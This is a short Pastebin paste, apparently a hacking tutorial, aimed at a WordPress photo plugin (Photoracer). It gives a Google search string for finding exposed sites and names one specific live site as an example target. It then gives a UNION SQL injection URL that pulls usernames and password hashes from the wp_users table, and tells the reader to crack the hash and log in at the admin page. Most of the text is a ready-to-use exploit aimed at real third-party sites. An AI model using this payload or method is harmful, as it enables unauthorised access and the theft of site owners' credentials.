Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- inurl:"wp-content/plugins/photoracer/viewimg.php?id="
- and i'm gonna test 1 of them for ex this find in google
- http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
- we are going to add the exploit : this is the exploit
- /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
- and the site look like this
- http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
- now you can see the user and pass :D ! Just crack the hash and it's done
- The admin panel is
- http://Site/wp-login.php
Add Comment
Please, Sign In to add comment
